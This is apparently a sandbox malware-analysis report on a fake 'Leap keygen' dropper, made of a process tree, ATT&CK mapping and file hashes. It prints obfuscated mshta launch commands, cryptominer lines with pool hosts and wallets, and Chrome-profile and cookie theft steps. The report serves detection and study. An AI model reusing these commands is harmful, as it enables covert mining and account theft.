                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:3180
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k SystemNetworkService
                                                                                                                                      2⤵
                                                                                                                                      • Drops file in System32 directory
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      • Modifies data under HKEY_USERS
                                                                                                                                      • Modifies registry class
                                                                                                                                      PID:4404
                                                                                                                                  • C:\Windows\System32\rundll32.exe
                                                                                                                                    C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                                                                                                    1⤵
                                                                                                                                      PID:4560
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\Temp2_Leap_keygen_by_Lz0.zip\Leap_keygen_by_Lz0.exe
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\Temp2_Leap_keygen_by_Lz0.zip\Leap_keygen_by_Lz0.exe"
                                                                                                                                      1⤵
                                                                                                                                        PID:4340
                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat" "
                                                                                                                                          2⤵
                                                                                                                                            PID:4212
                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                              keygen-pr.exe -p83fsase3Ge
                                                                                                                                              3⤵
                                                                                                                                              • Executes dropped EXE
                                                                                                                                              PID:4180
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe"
                                                                                                                                                4⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4796
                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe
                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\RarSFX1\key.exe -txt -scanlocal -file:potato.dat
                                                                                                                                                  5⤵
                                                                                                                                                    PID:2668
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                keygen-step-1.exe
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:2100
                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe
                                                                                                                                                keygen-step-5.exe
                                                                                                                                                3⤵
                                                                                                                                                • Executes dropped EXE
                                                                                                                                                PID:4532
                                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                  "C:\Windows\System32\mshta.exe" VbScrIPt: ClosE( CReatEobjEct ( "wSCRipt.ShELL" ).RUN ( "cMD.exE /Q /C TYpE ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe""> Z5qgkZW.exe&& sTaRT Z5qgkZW.exe -P55kwJkreZhe20KkUTLcgvMphxFiZBR &if """" == """" for %O in ( ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"" ) do taskkill -im ""%~NXO"" -f > NUl " , 0 ) )
                                                                                                                                                  4⤵
                                                                                                                                                    PID:4704
                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /Q /C TYpE "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe"> Z5qgkZW.exe&& sTaRT Z5qgkZW.exe -P55kwJkreZhe20KkUTLcgvMphxFiZBR &if "" == "" for %O in ( "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-5.exe" ) do taskkill -im "%~NXO" -f > NUl
                                                                                                                                                      5⤵
                                                                                                                                                        PID:4628
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\Z5qgkZW.exe
                                                                                                                                                          Z5qgkZW.exe -P55kwJkreZhe20KkUTLcgvMphxFiZBR
                                                                                                                                                          6⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          PID:2608
                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                            "C:\Windows\System32\mshta.exe" VbScrIPt: ClosE( CReatEobjEct ( "wSCRipt.ShELL" ).RUN ( "cMD.exE /Q /C TYpE ""C:\Users\Admin\AppData\Local\Temp\Z5qgkZW.exe""> Z5qgkZW.exe&& sTaRT Z5qgkZW.exe -P55kwJkreZhe20KkUTLcgvMphxFiZBR &if ""-P55kwJkreZhe20KkUTLcgvMphxFiZBR "" == """" for %O in ( ""C:\Users\Admin\AppData\Local\Temp\Z5qgkZW.exe"" ) do taskkill -im ""%~NXO"" -f > NUl " , 0 ) )
                                                                                                                                                            7⤵
                                                                                                                                                              PID:4880
                                                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /Q /C TYpE "C:\Users\Admin\AppData\Local\Temp\Z5qgkZW.exe"> Z5qgkZW.exe&& sTaRT Z5qgkZW.exe -P55kwJkreZhe20KkUTLcgvMphxFiZBR &if "-P55kwJkreZhe20KkUTLcgvMphxFiZBR " == "" for %O in ( "C:\Users\Admin\AppData\Local\Temp\Z5qgkZW.exe" ) do taskkill -im "%~NXO" -f > NUl
                                                                                                                                                                8⤵
                                                                                                                                                                  PID:4696
                                                                                                                                                              • C:\Windows\SysWOW64\regsvr32.exe
                                                                                                                                                                "C:\Windows\System32\regsvr32.exe" /S .\6Oi_IN.~1 -U
                                                                                                                                                                7⤵
                                                                                                                                                                • Loads dropped DLL
                                                                                                                                                                • Suspicious use of NtCreateThreadExHideFromDebugger
                                                                                                                                                                PID:1664
                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                              taskkill -im "keygen-step-5.exe" -f
                                                                                                                                                              6⤵
                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                              • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                              PID:1224
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe
                                                                                                                                                        keygen-step-2.exe
                                                                                                                                                        3⤵
                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                        PID:4448
                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\1166.tmp.exe
                                                                                                                                                          "C:\Users\Admin\AppData\Roaming\1166.tmp.exe"
                                                                                                                                                          4⤵
                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                          • Loads dropped DLL
                                                                                                                                                          PID:4100
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Roaming\1166.tmp.exe"
                                                                                                                                                            5⤵
                                                                                                                                                              PID:5156
                                                                                                                                                              • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                timeout /T 10 /NOBREAK
                                                                                                                                                                6⤵
                                                                                                                                                                • Delays execution with timeout.exe
                                                                                                                                                                PID:5188
                                                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                            "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-2.exe" >> NUL
                                                                                                                                                            4⤵
                                                                                                                                                              PID:4704
                                                                                                                                                              • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                ping 127.0.0.1
                                                                                                                                                                5⤵
                                                                                                                                                                • Runs ping.exe
                                                                                                                                                                PID:1996
                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe
                                                                                                                                                            keygen-step-3.exe
                                                                                                                                                            3⤵
                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                            PID:4900
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-3.exe"
                                                                                                                                                              4⤵
                                                                                                                                                                PID:2056
                                                                                                                                                                • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                  ping 1.1.1.1 -n 1 -w 3000
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Runs ping.exe
                                                                                                                                                                  PID:64
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-4.exe
                                                                                                                                                              keygen-step-4.exe
                                                                                                                                                              3⤵
                                                                                                                                                              • Executes dropped EXE
                                                                                                                                                              PID:1884
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\asdw.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\asdw.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                • Drops file in Program Files directory
                                                                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                                                                PID:4264
                                                                                                                                                                • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                  "C:\Windows\System32\rundll32.exe" "C:\Program Files\pdfsetup.dll",install
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Modifies registry class
                                                                                                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                  PID:4536
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe
                                                                                                                                                                "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                4⤵
                                                                                                                                                                • Executes dropped EXE
                                                                                                                                                                PID:4768
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\1CA1.tmp.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\1CA1.tmp.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:4644
                                                                                                                                                                  • C:\Users\Admin\AppData\Roaming\1CA1.tmp.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Roaming\1CA1.tmp.exe"
                                                                                                                                                                    6⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                    PID:2620
                                                                                                                                                                • C:\Users\Admin\AppData\Roaming\1FEE.tmp.exe
                                                                                                                                                                  "C:\Users\Admin\AppData\Roaming\1FEE.tmp.exe"
                                                                                                                                                                  5⤵
                                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                                  • Adds Run key to start application
                                                                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                                                                  PID:1876
                                                                                                                                                                  • C:\Windows\system32\msiexec.exe
                                                                                                                                                                    -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w22155@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                                                                                                    6⤵
                                                                                                                                                                      PID:3848
                                                                                                                                                                    • C:\Windows\system32\msiexec.exe
                                                                                                                                                                      -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w5745 --cpu-max-threads-hint 50 -r 9999
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Blocklisted process makes network request
                                                                                                                                                                      PID:4872
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX2\file.exe"
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:4252
                                                                                                                                                                      • C:\Windows\SysWOW64\PING.EXE
                                                                                                                                                                        ping 127.0.0.1
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Runs ping.exe
                                                                                                                                                                        PID:4836
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe
                                                                                                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX2\askinstall20.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Drops Chrome extension
                                                                                                                                                                    PID:2388
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      cmd.exe /c taskkill /f /im chrome.exe
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:5088
                                                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                          taskkill /f /im chrome.exe
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Kills process with taskkill
                                                                                                                                                                          PID:3328
                                                                                                                                                                      • C:\Windows\SysWOW64\xcopy.exe
                                                                                                                                                                        xcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\" /s /e /y
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                        PID:1476
                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/
                                                                                                                                                                        5⤵
                                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                                        PID:3940
                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd4,0xd8,0xdc,0xb0,0xe0,0x7ff8916b4f50,0x7ff8916b4f60,0x7ff8916b4f70
                                                                                                                                                                          6⤵
                                                                                                                                                                            PID:4768
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1500,6519354799754237510,10309019386113792400,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=1648 /prefetch:8
                                                                                                                                                                            6⤵
                                                                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                            PID:2916
                                                                                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1500,6519354799754237510,10309019386113792400,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1512 /prefetch:2
                                                                                                                                                                            6⤵
                                                                                                                                                                              PID:4812
                                                                                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1500,6519354799754237510,10309019386113792400,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --mojo-platform-channel-handle=2284 /prefetch:8
                                                                                                                                                                              6⤵
                                                                                                                                                                                PID:2192
                                                                                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,6519354799754237510,10309019386113792400,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2800 /prefetch:1
                                                                                                                                                                                6⤵
                                                                                                                                                                                  PID:4772
                                                                                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,6519354799754237510,10309019386113792400,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2792 /prefetch:1
                                                                                                                                                                                  6⤵
                                                                                                                                                                                    PID:4712
                                                                                                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,6519354799754237510,10309019386113792400,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3248 /prefetch:1
                                                                                                                                                                                    6⤵
                                                                                                                                                                                      PID:4792
                                                                                                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,6519354799754237510,10309019386113792400,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3372 /prefetch:1
                                                                                                                                                                                      6⤵
                                                                                                                                                                                        PID:3968
                                                                                                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,6519354799754237510,10309019386113792400,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3740 /prefetch:1
                                                                                                                                                                                        6⤵
                                                                                                                                                                                          PID:2524
                                                                                                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1500,6519354799754237510,10309019386113792400,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\cghjgasaaz99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4016 /prefetch:1
                                                                                                                                                                                          6⤵
                                                                                                                                                                                            PID:2148
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\md4_4igk.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Checks whether UAC is enabled
                                                                                                                                                                                        PID:2164
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\BTRSetp.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        PID:4384
                                                                                                                                                                                        • C:\ProgramData\4937376.exe
                                                                                                                                                                                          "C:\ProgramData\4937376.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:4836
                                                                                                                                                                                        • C:\ProgramData\7606150.exe
                                                                                                                                                                                          "C:\ProgramData\7606150.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Adds Run key to start application
                                                                                                                                                                                          PID:4572
                                                                                                                                                                                          • C:\ProgramData\Windows Host\Windows Host.exe
                                                                                                                                                                                            "C:\ProgramData\Windows Host\Windows Host.exe"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:3984
                                                                                                                                                                                        • C:\ProgramData\288487.exe
                                                                                                                                                                                          "C:\ProgramData\288487.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious use of SetThreadContext
                                                                                                                                                                                          PID:4784
                                                                                                                                                                                          • C:\ProgramData\288487.exe
                                                                                                                                                                                            "{path}"
                                                                                                                                                                                            6⤵
                                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                                            PID:5312
                                                                                                                                                                                        • C:\ProgramData\599495.exe
                                                                                                                                                                                          "C:\ProgramData\599495.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:3800
                                                                                                                                                                                        • C:\ProgramData\1967553.exe
                                                                                                                                                                                          "C:\ProgramData\1967553.exe"
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:4860
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe
                                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX2\gcttt.exe"
                                                                                                                                                                                        4⤵
                                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                                        • Adds Run key to start application
                                                                                                                                                                                        PID:4644
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          PID:1488
                                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                                                                                                                          5⤵
                                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                                                                                          PID:5232

                                                                                                                                                                                Network

                                                                                                                                                                                MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                Persistence

                                                                                                                                                                                Registry Run Keys / Startup Folder

                                                                                                                                                                                1
                                                                                                                                                                                T1060

                                                                                                                                                                                Defense Evasion

                                                                                                                                                                                Modify Registry

                                                                                                                                                                                2
                                                                                                                                                                                T1112

                                                                                                                                                                                Install Root Certificate

                                                                                                                                                                                1
                                                                                                                                                                                T1130

                                                                                                                                                                                Credential Access

                                                                                                                                                                                Credentials in Files

                                                                                                                                                                                4
                                                                                                                                                                                T1081

                                                                                                                                                                                Discovery

                                                                                                                                                                                Query Registry

                                                                                                                                                                                3
                                                                                                                                                                                T1012

                                                                                                                                                                                System Information Discovery

                                                                                                                                                                                4
                                                                                                                                                                                T1082

                                                                                                                                                                                Remote System Discovery

                                                                                                                                                                                1
                                                                                                                                                                                T1018

                                                                                                                                                                                Collection

                                                                                                                                                                                Data from Local System

                                                                                                                                                                                4
                                                                                                                                                                                T1005

                                                                                                                                                                                Command and Control

                                                                                                                                                                                Web Service

                                                                                                                                                                                1
                                                                                                                                                                                T1102

                                                                                                                                                                                Replay Monitor

                                                                                                                                                                                Loading Replay Monitor...

                                                                                                                                                                                Downloads

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\settings.dat
                                                                                                                                                                                  MD5

                                                                                                                                                                                  6455cb1d45ab7e8488a2820240f178cc

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  4634f16839aa8f8b4e0de20e1d4b48d5be2d3cca

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  f616db5b20acc982e57d9eb35fa53d4de3c08ecc7f74aa1a1ab5554a3343b1ca

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  7dace7acade439f886055b40b4aaa6c0113f1a1aedc26b34aaf6105e5f6f5cf3590fbefcd7176f9595b1ff3de2587450846ca6dd7e03a6e81799f0f763ae5369

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-pr.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  65b49b106ec0f6cf61e7dc04c0a7eb74

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  a1f4784377c53151167965e0ff225f5085ebd43b

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  862a8cf0e5561c848145a1a1f464acf77f92a3b15cc43722a7208701f60a2fcd

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  e9030cd609f42fb616e5bac3a5203ae46bbae9ec95682432a367f8805cdaa3e30c18a732ceddb0545ac653d543348a6728866149d2822752c80948066bfdf3da

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  c615d0bfa727f494fee9ecb3f0acf563

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6c3509ae64abc299a7afa13552c4fe430071f087

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  95d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen-step-1.exe
                                                                                                                                                                                  MD5

                                                                                                                                                                                  c615d0bfa727f494fee9ecb3f0acf563

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  6c3509ae64abc299a7afa13552c4fe430071f087

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  95d91febc45d03c1ee477c127bcbd332cd6fbce1e91105004af723594e6f0199

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  d97256eb93d8e546f5fb5c61bebe61e7dfab316eb7685be83782bd36b28df3f80880e7b823197a4b6bae1af7b9460c4c81357dd44ed199ab93ccaee5acc10e51

                                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\RarSFX0\keygen.bat
                                                                                                                                                                                  MD5

                                                                                                                                                                                  39f80c4d452a26def7a2d05f32a74e02

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  de6ef8e49e7725f627b1d748d7138c226bff75e1

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  f8d3c7043a3308cc1dedcf76bc0cd484df93822a7e3edddcab1595bb4959e582

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  97f6af2ca63a6784b9d63d996d68cec36b7eca8a39a85ea6ef3e3d540594944a7539266fec15fa4843ec1cd87d9523a723cedf00b6feaa5cc666b99ae67adf56

                                                                                                                                                                                • \??\pipe\crashpad_3680_MEKOEYJQTAFTEGEC
                                                                                                                                                                                  MD5

                                                                                                                                                                                  d41d8cd98f00b204e9800998ecf8427e

                                                                                                                                                                                  SHA1

                                                                                                                                                                                  da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                                                                                  SHA256

                                                                                                                                                                                  e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                                                                                  SHA512

                                                                                                                                                                                  cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                                                                                • \??\pipe\crashpad_5080_FINCAKULEBYDYFPS
                                                                                                                                                                                  MD5

